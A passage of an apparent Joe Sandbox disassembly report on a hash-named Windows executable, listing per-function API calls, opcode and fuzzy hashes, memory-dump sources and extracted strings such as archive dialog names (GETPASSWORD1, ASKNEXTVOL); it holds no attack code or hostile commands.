                                                                                          • Instruction ID: e477c8096093073c0c10f93b7a17227cce6b5b13d581e4418659d361f022edf7
                                                                                          • Opcode Fuzzy Hash: 7b106ff1627cdba75b162444d3a9832cf7003e30cce138611df01a51324970b3
                                                                                          • Instruction Fuzzy Hash: 4BE04FB0500747AEDB475B799D48F65FB94BF50710F10852AF154C6642DBB4D4A4CB50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: 814d87774ffa1a0ec261c969a1610a0b6b45fbfbbe32e383fea4bc4c49aa9814
                                                                                          • Instruction ID: 48ad44df8fd93e9e4b2b3c44be51593f8d56cc8e27837485df64548c369d0063
                                                                                          • Opcode Fuzzy Hash: 814d87774ffa1a0ec261c969a1610a0b6b45fbfbbe32e383fea4bc4c49aa9814
                                                                                          • Instruction Fuzzy Hash: 8A41C176A006249FCB12DF79C881A5EB3F5EF88318F164669E515EB381DB71AD01CB80
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 003E89B8
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003E89DB
                                                                                            • Part of subcall function 003E59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003E8A01
                                                                                          • _free.LIBCMT ref: 003E8A14
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003E8A23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 336800556-0
                                                                                          • Opcode ID: 8515ba00986c070046fa8e4b47ca4a8c0bcdee6530fb4e245e9df291ba82454d
                                                                                          • Instruction ID: 5680abc5a6b276a42599ccb901d4f4f3d63868113234c63d35be0a170ae89b64
                                                                                          • Opcode Fuzzy Hash: 8515ba00986c070046fa8e4b47ca4a8c0bcdee6530fb4e245e9df291ba82454d
                                                                                          • Instruction Fuzzy Hash: EC0184B2A016B57B272757BB5C4CC7B6A6DDAC6FA0315033AF908E7192EE608C0181B1
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,003E5E43,003E5ADF,?,003E634D,00000001,00000364,?,003E2213,?,?,003FCBE8), ref: 003E63A8
                                                                                          • _free.LIBCMT ref: 003E63DD
                                                                                          • _free.LIBCMT ref: 003E6404
                                                                                          • SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E6411
                                                                                          • SetLastError.KERNEL32(00000000,?,003FCBE8), ref: 003E641A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: 5a8a1438be383971c1cb8621b462761e808a80a3de6cc83498b6b580e4a174a0
                                                                                          • Instruction ID: 6cb52c68ba64a899e30d18941282709d53a39bf0aa8dc0014fd360af466fe769
                                                                                          • Opcode Fuzzy Hash: 5a8a1438be383971c1cb8621b462761e808a80a3de6cc83498b6b580e4a174a0
                                                                                          • Instruction Fuzzy Hash: 3201D676245BA167C707262B2C8BA6A261D9FE17B5B324324F415A61E3EF358C018160
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 003E9282
                                                                                            • Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
                                                                                            • Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA
                                                                                          • _free.LIBCMT ref: 003E9294
                                                                                          • _free.LIBCMT ref: 003E92A6
                                                                                          • _free.LIBCMT ref: 003E92B8
                                                                                          • _free.LIBCMT ref: 003E92CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 2266cdca54049f1e9f623ca40e84c198b70eee8edc309d5cc0e69cf86e9608ff
                                                                                          • Instruction ID: 50bc729bfd9307b6a76547a7335fd01597002858e39d047acde4c355f21b2647
                                                                                          • Opcode Fuzzy Hash: 2266cdca54049f1e9f623ca40e84c198b70eee8edc309d5cc0e69cf86e9608ff
                                                                                          • Instruction Fuzzy Hash: 0FF0C272201BA4FBCE23EB5AE882D9637EDAA403A0B550E06F04CCB582C774FC80C750
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 003E555D
                                                                                            • Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
                                                                                            • Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA
                                                                                          • _free.LIBCMT ref: 003E556F
                                                                                          • _free.LIBCMT ref: 003E5582
                                                                                          • _free.LIBCMT ref: 003E5593
                                                                                          • _free.LIBCMT ref: 003E55A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 38d88bf62ce695365024e768e6634ccea7578c774f98666870bf70e640fd8d57
                                                                                          • Instruction ID: e6e5a9f8f632b31520698b4aeffeeaf3bceb5c850941ca6279d82042dde3c312
                                                                                          • Opcode Fuzzy Hash: 38d88bf62ce695365024e768e6634ccea7578c774f98666870bf70e640fd8d57
                                                                                          • Instruction Fuzzy Hash: 92F030B4512A74DB8B036F19BD014983B64FB49724345832AF454562B2C7740822DBCB
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe,00000104), ref: 003E4C1A
                                                                                          • _free.LIBCMT ref: 003E4CE5
                                                                                          • _free.LIBCMT ref: 003E4CEF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                          • API String ID: 2506810119-649463514
                                                                                          • Opcode ID: c13fb35ee25c7fb285ad819271d0d2275c5d0a42ded11e71b6e0dbd94896bbff
                                                                                          • Instruction ID: 1b95684fcac01cb27c1abc7ec0339c7d227265ad529e98dfdc8a5e46a9aff068
                                                                                          • Opcode Fuzzy Hash: c13fb35ee25c7fb285ad819271d0d2275c5d0a42ded11e71b6e0dbd94896bbff
                                                                                          • Instruction Fuzzy Hash: E0319771A012A8FFCB22DF5A9C8199EBBFCEB89710F214266F81497291D7705E40CB91
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C7468
                                                                                            • Part of subcall function 003C3AA3: __EH_prolog.LIBCMT ref: 003C3AA8
                                                                                          • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 003C752E
                                                                                            • Part of subcall function 003C7A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 003C7AAC
                                                                                            • Part of subcall function 003C7A9D: GetLastError.KERNEL32 ref: 003C7AF2
                                                                                            • Part of subcall function 003C7A9D: CloseHandle.KERNEL32(?), ref: 003C7B01
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                          • API String ID: 3813983858-639343689
                                                                                          • Opcode ID: c6e27bd536db0ef70c1bceaa47955724df59af2580a2a92e7ef430b5729961e0
                                                                                          • Instruction ID: 106bc633151ab961334fbdb6a16dbf3d06ccaffb5d6abb04980ee9f8e9678378
                                                                                          • Opcode Fuzzy Hash: c6e27bd536db0ef70c1bceaa47955724df59af2580a2a92e7ef430b5729961e0
                                                                                          • Instruction Fuzzy Hash: 3C318D75944248AADF22EB68DC42FEE7B68AF45310F00802AF849EB292D7744E44CB61
                                                                                          APIs
                                                                                            • Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
                                                                                            • Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341
                                                                                          • EndDialog.USER32(?,00000001), ref: 003D91AB
                                                                                          • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 003D91C0
                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 003D91D5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$DialogWindow
                                                                                          • String ID: ASKNEXTVOL
                                                                                          • API String ID: 445417207-3402441367
                                                                                          • Opcode ID: 890cdc11d9783c7d4d582bc98bbbad06d0f8e6aaa5520c777676a359bcf345e5
                                                                                          • Instruction ID: 968be40315462a260fcf5ccfd6fa5d2735ea32195389a8dc324f20d0dd73d114
                                                                                          • Opcode Fuzzy Hash: 890cdc11d9783c7d4d582bc98bbbad06d0f8e6aaa5520c777676a359bcf345e5
                                                                                          • Instruction Fuzzy Hash: F611D033245202BFD6139BA4ED4EFA63BADAB4A701F014423F201DB2A1C2629C55DB26
                                                                                          APIs
                                                                                          • DialogBoxParamW.USER32(GETPASSWORD1,?,003D9646,?,?), ref: 003DC022
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: DialogParam
                                                                                          • String ID: *a@$*a@$GETPASSWORD1
                                                                                          • API String ID: 665744214-2360177026
                                                                                          • Opcode ID: 86a3163596dc8c9db090c576f91fa631321eb6948d418a5627b5826f8b97860d
                                                                                          • Instruction ID: 4a20ecf44f437aa9b3276eac9a74e7361e5558f71bf3c5ff5644d455ecd9448a
                                                                                          • Opcode Fuzzy Hash: 86a3163596dc8c9db090c576f91fa631321eb6948d418a5627b5826f8b97860d
                                                                                          • Instruction Fuzzy Hash: 28113B33264209ABDB23DE24BD05BFA3798BB09751F05407AFE49AB2C1D7B49C50D794
                                                                                          APIs
                                                                                            • Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
                                                                                            • Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341
                                                                                          • EndDialog.USER32(?,00000001), ref: 003D9694
                                                                                          • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 003D96AC
                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 003D96DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$DialogWindow
                                                                                          • String ID: GETPASSWORD1
                                                                                          • API String ID: 445417207-3292211884
                                                                                          • Opcode ID: 51c1b40d0bfb33cbe585ae737e889ba5f4f53661f285f9eaf158f55aa6030fda
                                                                                          • Instruction ID: 5ec8aa5005262914e2d84405f4ed7ffaed24f3c60fd7bd8550833f4a7b9cc96a
                                                                                          • Opcode Fuzzy Hash: 51c1b40d0bfb33cbe585ae737e889ba5f4f53661f285f9eaf158f55aa6030fda
                                                                                          • Instruction Fuzzy Hash: 1D11E1739001187ADB239E64AD49FFA776CEB09760F010027FA49E6680C2A5ED54D7A1
                                                                                          APIs
                                                                                          • _swprintf.LIBCMT ref: 003CB127
                                                                                            • Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E
                                                                                          • _wcschr.LIBVCRUNTIME ref: 003CB145
                                                                                          • _wcschr.LIBVCRUNTIME ref: 003CB155
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                          • String ID: %c:\
                                                                                          • API String ID: 525462905-3142399695
                                                                                          • Opcode ID: adfbfa35dbac95e56c81d9f3caad7442bd7d4b6068daea23f6ed56303f9736aa
                                                                                          • Instruction ID: f758a6187bf735e53b17952befc9f5da3d28fe53a17d9df70052add5bb643336
                                                                                          • Opcode Fuzzy Hash: adfbfa35dbac95e56c81d9f3caad7442bd7d4b6068daea23f6ed56303f9736aa
                                                                                          • Instruction Fuzzy Hash: FD01D25750432179CA22AB769C43E6BF7ACEE96360F5A451EF844CA082FB25DC50C3A1
                                                                                          APIs
                                                                                          • InitializeCriticalSection.KERNEL32(000001A0,00401E74,00000000,?,?,003CFB88,00000020,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?), ref: 003CF969
                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF), ref: 003CF973
                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,003CA7C2,?,003CC74B,?,00000000,?,00000001,?,?,?,003D3AFF), ref: 003CF983
                                                                                          Strings
                                                                                          • Thread pool initialization failed., xrefs: 003CF99B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                          • String ID: Thread pool initialization failed.
                                                                                          • API String ID: 3340455307-2182114853
                                                                                          • Opcode ID: 47dfb72e65b46682a05dc19b450ba91e44d4c777892c783101fb8c0e832769bb
                                                                                          • Instruction ID: 3921f8002e2dd0fe60b34cf976661e50b9c514f19d6d74adb3ba2bbec9532900
                                                                                          • Opcode Fuzzy Hash: 47dfb72e65b46682a05dc19b450ba91e44d4c777892c783101fb8c0e832769bb
                                                                                          • Instruction Fuzzy Hash: 00115EB1600706AFD3325F699889FA7FBECEB55355F11482EE2DAC6201DB712C40CB50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                          • API String ID: 0-56093855
                                                                                          • Opcode ID: cafde03d2054a013045e9811d92e2b947b02f9766d9e05d7dae9f01ab01a2976
                                                                                          • Instruction ID: fa182c487e1d486db0467368e1a6ebadf65d5f0356738771f45f0ffacf549826
                                                                                          • Opcode Fuzzy Hash: cafde03d2054a013045e9811d92e2b947b02f9766d9e05d7dae9f01ab01a2976
                                                                                          • Instruction Fuzzy Hash: 76019E77A08205EFC3028B28FE44E26BBADE749394F024437E641A2770D3729C04EF65
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 003CCE57
                                                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 003CCE66
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
